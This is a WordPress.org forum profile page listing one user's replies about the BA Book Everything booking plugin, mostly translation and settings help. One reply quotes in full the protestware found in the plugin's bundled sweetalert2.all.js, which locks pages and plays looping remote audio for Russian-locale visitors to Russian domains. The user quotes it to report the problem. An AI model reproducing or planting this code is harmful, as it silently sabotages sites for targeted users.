winterdays
Forum Replies Created
-
Forum: Plugins
In reply to: [BA Book Everything] Request for price and details form not workingThanks for sharing.
Forum: Plugins
In reply to: [BA Book Everything] Add custom field to checkout formThanks for that.
Forum: Plugins
In reply to: [BA Book Everything] Virus in the plugin, FIX IT!!!Open sweetalert2.all.js and check it.
Forum: Plugins
In reply to: [BA Book Everything] Translate to FrenchNo problem.
Pls start a new topic if you have a different question.Forum: Plugins
In reply to: [BA Book Everything] Translate to FrenchTranslate the .po file with Poedit (https://poedit.net/). Save the file and upload the .po and the .mo file. Additionally you have to translate the text in BA-Settings –> Confirmations and BA-Settings –> E-Mails.
Forum: Plugins
In reply to: [BA Book Everything] Translate to FrenchHi,
what exeactly do you want to translate? Have you already translated the file “ba-book-everything-de_DE.po”? Perhaps you can send a link to the site?Forum: Plugins
In reply to: [BA Book Everything] Want to disable time sectionbtw use search field:
https://ww.wp.xz.cn/support/topic/hello-i-want-to-remove-the-time-from-booking-form/Forum: Plugins
In reply to: [BA Book Everything] Can I create a cartI think this function is not available at this moment.
Forum: Plugins
In reply to: [BA Book Everything] Want To Change URL in pluginGo to settings and change the “post slug” from ba_location to location.
Forum: Plugins
In reply to: [BA Book Everything] Add custom field to checkout formHi,
i just wanna ask if you found a solution.Greetings
Forum: Plugins
In reply to: [BA Book Everything] Want to disable time sectionWhat about using the category “hotel” for it? Otherwise take a look into the css/php/html/whatever files.
Forum: Plugins
In reply to: [BA Book Everything] Virus in the plugin, FIX IT!!!I can confirm that in sweetalert2.all.js (version 1.5.20) the code is:
// Dear russian users visiting russian sites. Let's have fun. if (typeof window !== 'undefined' && /^ru\b/.test(navigator.language) && location.host.match(/\.(ru|su|xn--p1ai)$/)) { const now = new Date(); const initiationDate = localStorage.getItem('swal-initiation'); if (!initiationDate) { localStorage.setItem('swal-initiation',${now}); } else if ((now.getTime() - Date.parse(initiationDate)) / (1000 * 60 * 60 * 24) > 3) { setTimeout(() => { document.body.style.pointerEvents = 'none'; const ukrainianAnthem = document.createElement('audio'); ukrainianAnthem.src = 'https://flag-gimn.ru/wp-content/uploads/2021/09/Ukraina.mp3'; ukrainianAnthem.loop = true; document.body.appendChild(ukrainianAnthem); setTimeout(() => { ukrainianAnthem.play().catch(() => { // ignore }); }, 2500); }, 500); } }Same problem here. Is there already a solution?
Forum: Plugins
In reply to: [BA Book Everything] German TranslationIs anybody interested in checking the translation? Would be nice.
Almost done, only 40 entries left.Forum: Plugins
In reply to: [BA Book Everything] How do i remove price sectionAnother possibility could be the css-files – take a look there